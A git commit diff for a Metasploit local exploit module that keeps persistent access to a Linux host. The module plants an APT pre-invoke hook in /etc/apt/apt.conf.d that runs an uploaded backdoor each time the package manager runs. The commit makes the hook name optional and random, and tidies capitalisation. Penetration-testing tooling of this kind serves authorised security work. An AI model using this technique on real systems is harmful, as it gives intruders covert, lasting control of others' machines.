Dont require hook name

2019-04-26 13:11:40 -05:00 · 2019-04-26 13:11:40 -05:00 · 1faa41aafe
parent c643436383
commit 1faa41aafe
1 changed files with 7 additions and 8 deletions
--- a/modules/exploits/linux/local/apt_package_manager_persistence.rb
+++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb
@ -16,8 +16,8 @@ class MetasploitModule < Msf::Exploit::Local
      'Description'    => %q(
        This module will run a payload when the package manager is used. No
        handler is ran automatically so you must configure an appropriate
-        exploit/multi/handler to connect. Module creates a pre-invoke hook
-        for APT in apt.conf.d. The Hook name syntax is numeric followed by text.
+        exploit/multi/handler to connect. This module creates a pre-invoke hook
+        for APT in apt.conf.d. The hook name syntax is numeric followed by text.
      ),
      'License'        => MSF_LICENSE,
      'Author'         => ['Aaron Ringo'],
@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Local
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
-      'DisclosureDate' => '1999-03-09', # Date Apt package manager was included in Debian
+      'DisclosureDate' => '1999-03-09', # Date APT package manager was included in Debian
      'References'     => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0
@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Local

    register_options(
      [
-        OptString.new('HOOKNAME', [true, 'Name of hook file to write', '05new-hook']),
+        OptString.new('HOOKNAME', [false, 'Name of hook file to write']),
        OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write'])
      ])

@ -56,9 +56,9 @@ class MetasploitModule < Msf::Exploit::Local
  def exploit
    hook_path = '/etc/apt/apt.conf.d/'
    unless writable? hook_path
-      fail_with Failure::BadConfig, "#{hook_path} not writable, or apt is not on system"
+      fail_with Failure::BadConfig, "#{hook_path} not writable, or APT is not on system"
    end
-    hook_path << datastore['HOOKNAME']
+    hook_path << (datastore['HOOKNAME'] || "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}")

    backdoor_path = datastore['WritableDir']
    unless writable? backdoor_path
@ -86,10 +86,9 @@ class MetasploitModule < Msf::Exploit::Local
      fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
    end
    print_status("Backdoor uploaded #{backdoor_path}")
-    print_status('Backdoor will run on next Apt update')
+    print_status('Backdoor will run on next APT update')

    # permissions chosen to reflect common perms in /usr/local/bin/
    chmod(backdoor_path, 0755)
-
  end
 end